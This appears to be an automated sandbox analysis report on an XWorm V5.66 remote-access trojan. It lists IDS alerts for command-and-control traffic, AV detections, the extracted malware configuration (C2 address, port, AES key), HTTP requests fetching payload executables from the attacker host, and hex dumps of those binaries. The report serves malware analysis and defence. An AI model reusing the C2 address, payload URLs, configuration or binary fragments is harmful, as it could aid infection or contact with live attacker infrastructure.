            2025-03-26T04:19:07.043940+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:13.467848+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:16.762696+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:18.887479+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:19.083128+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:24.279149+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:26.247568+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:34.544073+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:34.743055+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:37.888014+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:39.795628+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:40.235872+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:43.464364+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:45.185013+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:45.381022+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:50.684969+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:19:50.881516+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:02.715303+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:13.465253+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:13.967983+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:15.060706+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:19.015072+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:25.631596+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:27.590423+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            2025-03-26T04:20:31.899017+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:49.517689+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:01.482824+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:13.453838+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:25.428914+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:37.393662+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:44.861673+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:50.227234+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:50.421926+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:50.666373+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:54.844212+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:17:55.285057+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:07.092219+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:10.937363+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:11.179489+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:16.469414+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:26.594039+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:35.596080+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:36.913554+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:37.164279+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:42.969926+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:54.956480+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:18:57.317866+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:02.678853+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:07.045934+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:16.764512+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:19.083288+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:19.318764+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:24.281096+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:26.249496+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:34.743146+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:34.937960+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:37.889843+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:39.800308+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:40.237882+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:45.381284+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:45.617888+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:50.881600+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:19:51.136493+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:02.717007+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:13.972424+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:15.062352+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:19.016686+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:25.634097+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:27.592172+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:31.900002+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:43.466077+010028588011Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:18:35.395014+010028587991Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP

            Joe Sandbox Signatures

            • AV Detection
            • Compliance
            • Networking
            • E-Banking Fraud
            • System Summary
            • Data Obfuscation
            • Persistence and Installation Behavior
            • Hooking and other Techniques for Hiding and Protection
            • Malware Analysis System Evasion
            • Anti Debugging
            • HIPS / PFW / Operating System Protection Evasion
            • Language, Device and Operating System Detection
            • Lowering of HIPS / PFW / Operating System Security Settings
            • Stealing of Sensitive Information
            • Remote Access Functionality

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://92.255.85.2/a.mp4Avira URL Cloud: Label: malware
            Source: http://92.255.85.2/k.exeAvira URL Cloud: Label: phishing
            Source: http://92.255.85.2/Fox.exeAvira URL Cloud: Label: phishing
            Source: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dllAvira: detection malicious, Label: TR/Dropper.Gen7
            Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.66"}
            Source: 92.255.85.2.batVirustotal: Detection: 17%Perma Link
            Source: 92.255.85.2.batReversingLabs: Detection: 16%
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 92.255.85.2
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 4372
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: P0WER
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: XWorm V5.66
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdbhP source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdb source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.4:49717 -> 92.255.85.2:80
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.85.2:4372 -> 192.168.2.4:49722
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.85.2:4372 -> 192.168.2.4:49722
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49722 -> 92.255.85.2:4372
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49722 -> 92.255.85.2:4372
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49722 -> 92.255.85.2:4372
            Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49717 -> 92.255.85.2:80
            Source: Malware configuration extractorURLs: 92.255.85.2
            Source: global trafficTCP traffic: 192.168.2.4:49722 -> 92.255.85.2:4372
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 25 Mar 2025 21:42:34 GMTAccept-Ranges: bytesETag: "24cc0d1ce9ddb1:0"Server: Microsoft-IIS/10.0Date: Wed, 26 Mar 2025 03:16:31 GMTContent-Length: 497568Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 fc ac ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ae 06 00 00 cc 00 00 00 00 00 00 8e cc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 6a bc 07 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 06 00 57 00 00 00 00 e0 06 00 9c c8 00 00 00 00 00 00 00 00 00 00 00 7c 07 00 a0 1b 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 ac 06 00 00 20 00 00 00 ae 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c c8 00 00 00 e0 06 00 00 ca 00 00 00 b0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 07 00 00 02 00 00 00 7a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 cc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 5d 01 00 f4 6e 05 00 03 00 02 00 04 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 00 28 05 01 00 06 2a 1e 00 28 06 01 00 06 2a 1e 00 28 07 01 00 06 2a 1e 00 28 08 01 00 06 2a 1e 00 28 09 01 00 06 2a 1e 00 28 0a 01 00 06 2a 1e 00 28 0b 01 00 06 2a 1e 00 28 0c 01 00 06 2a 1e 00 28 0d 01 00 06 2a 1e 00 28 0e 01 00 06 2a 1e 00 28 0f 01 00 06 2a 1e 00 28 10 01 00 06 2a 1e 00 28 11 01 00 06 2a 1e 00 28 12 01 00 06 2a 1e 00 28 13 01 00 06 2a 1e 00 28 14 01 00 06 2a 1e 00 28 15 01 00 06 2a 1e 00 28 16 01 00 06 2a 1e 00 28 17 01 00 06 2a 1e 00 28 18 01 00 06 2a 1e 00 28 19 01 00 06 2a 1e 00 28 1a 01 00 06 2a 1e 00 28 1b 01 00 06 2a 1e 00 28 1c 01 00 06 2a 1e 00 28 1d 01 00 06 2a 1e 00 28 1e 01 00 06 2a 1e 00 28 1f 01 00 06 2a 1e 00 28 20 01 00 06 2a 1e 00 28 21 01 00 06 2a 1e 00 28 22 01 00 06 2a 1e 00 28 23 01 00 06 2a 1e 00 28 24 01 00 06 2a 1e 00 28 25 01 00 06 2a 1e 00 28 26 01 00 06 2a 1e 00 28 27 01 00 06 2a 1e 00 28 28 01 00 06 2a 1e 00 28 29 01 00 06 2a 1e 00 28 2a 01 00 06 2a 1e 00 28 2b 01 00 06 2a 1e 00 28 2c 01 00 06 2a 1e 00 28
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 24 Mar 2025 16:34:54 GMTAccept-Ranges: bytesETag: "6cef5acda9cdb1:0"Server: Microsoft-IIS/10.0Date: Wed, 26 Mar 2025 03:16:32 GMTContent-Length: 33280Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad 89 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 4f 00 00 f0 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 0a
            Source: global trafficHTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Fox.exe HTTP/1.1Host: 92.255.85.2
            Source: global trafficHTTP traffic detected: GET /k.exe HTTP/1.1Host: 92.255.85.2
            Source: Joe Sandbox ViewIP Address: 92.255.85.2 92.255.85.2
            Source: Joe Sandbox ViewASN Name: SOVTEL-ASRU SOVTEL-ASRU
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49717 -> 92.255.85.2:80
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49717 -> 92.255.85.2:80
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: global trafficHTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Fox.exe HTTP/1.1Host: 92.255.85.2
            Source: global trafficHTTP traffic detected: GET /k.exe HTTP/1.1Host: 92.255.85.2
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891A72D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2
            Source: powershell.exe, 00000003.00000002.1345688716.000002891A9FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2/Fox.exe
            Source: powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2/a.mp4
            Source: powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2/k.exe
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
